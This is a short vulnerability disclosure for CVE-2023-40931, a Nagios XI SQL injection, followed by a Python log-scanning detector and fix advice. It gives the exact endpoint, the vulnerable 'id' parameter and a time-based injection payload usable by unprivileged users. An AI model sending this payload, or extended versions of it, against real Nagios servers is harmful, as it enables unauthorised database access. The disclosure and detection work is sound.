Nagios CVE-2023-40931 PoC

Nagios XI versions 5.11.0 and 5.11.1 are vulnerable to SQL injection.

SQL injection

Several endpoints in the Nagios XI suite are vulnerable to SQLi. However, the endpoint referred to in CVE-2023-40931 may be exploited by an unprivileged user.

Method:
POST

Endpoint:
https://<domain>/nagiosxi/admin/banner_message-ajaxhelper.php

Vulnerable parameter:
id

Database / DBMS:
MariaDB (MySQL)

Body (encoded):
action=acknowledge_banner_message&id=1%20OR%20%28select%20sleep%285%29%29&token=<token>

It may also be possible to exploit this without the token parameter.

Body decoded:
action=acknowledge_banner_message&id=1 OR (select sleep(5))

If you host Nagios XI and the response to this request is delayed by about 5 seconds, the injected sleep(5) was executed by the database: it’s time to update!
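As an added defensive example (not code from the original post or from Nagios), the following Python scans request records for the request shape described above. It assumes a hypothetical log export that records the request URL, the raw POST body and the response time in seconds; the sample records are constructed. It flags two signals: an `id` parameter that is not a plain integer, and an unusually slow response on the acknowledge endpoint (the time-based payload above relies on a 5 s delay).

```python
"""Detect probes against the Nagios XI banner_message-ajaxhelper.php endpoint.

Added example, not code from the original post or from Nagios. It assumes a
hypothetical log export with one (url, post_body, response_seconds) record
per request; the SAMPLE_RECORDS below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/nagiosxi/admin/banner_message-ajaxhelper.php"
INTEGER = re.compile(r"^\d+$")
SLOW_SECONDS = 5.0  # the PoC payload injects sleep(5); a normal acknowledge returns almost instantly

# Constructed sample records: (url, raw POST body, response time in seconds).
SAMPLE_RECORDS = [
    ("https://nagios.example.test/nagiosxi/admin/banner_message-ajaxhelper.php",
     "action=acknowledge_banner_message&id=7&token=TOKEN_PLACEHOLDER", 0.04),
    ("https://nagios.example.test/nagiosxi/admin/banner_message-ajaxhelper.php",
     "action=acknowledge_banner_message&id=1%20OR%20%28select%20sleep%285%29%29&token=TOKEN_PLACEHOLDER", 5.12),
    ("https://nagios.example.test/nagiosxi/admin/banner_message-ajaxhelper.php",
     "action=acknowledge_banner_message&id=1%20OR%20%28select%20sleep%285%29%29", 0.03),
    ("https://nagios.example.test/nagiosxi/index.php", "", 0.20),
]


def inspect_request(url, body, seconds):
    """Return the reasons a request looks like a CVE-2023-40931 probe (empty list = nothing seen)."""
    if urlsplit(url).path != VULN_PATH:
        return []
    reasons = []
    # parse_qs percent-decodes the body, so "id=1%20OR%20..." becomes "1 OR ...".
    params = parse_qs(body, keep_blank_values=True)
    for value in params.get("id", []):
        # Allowlist check: a legitimate banner id is a plain integer, nothing else.
        # This is more robust than a keyword blocklist, which encoding tricks can evade.
        if not INTEGER.match(value):
            reasons.append(f"non-integer id parameter: {value!r}")
    if seconds >= SLOW_SECONDS:
        reasons.append(f"slow response ({seconds:.2f}s) on acknowledge endpoint")
    return reasons


def scan(records):
    """Return (record_index, reasons) for every record that raised at least one reason."""
    hits = []
    for index, (url, body, seconds) in enumerate(records):
        reasons = inspect_request(url, body, seconds)
        if reasons:
            hits.append((index, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_RECORDS):
        print(f"record {index}: " + "; ".join(reasons))
```

The integer allowlist on `id` is the same check the application itself should enforce before the value reaches the query (cast to an integer or bind it as a parameter of a prepared statement); the slow-response signal is only a heuristic and will also fire on a genuinely overloaded server, so treat it as supporting evidence rather than proof.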
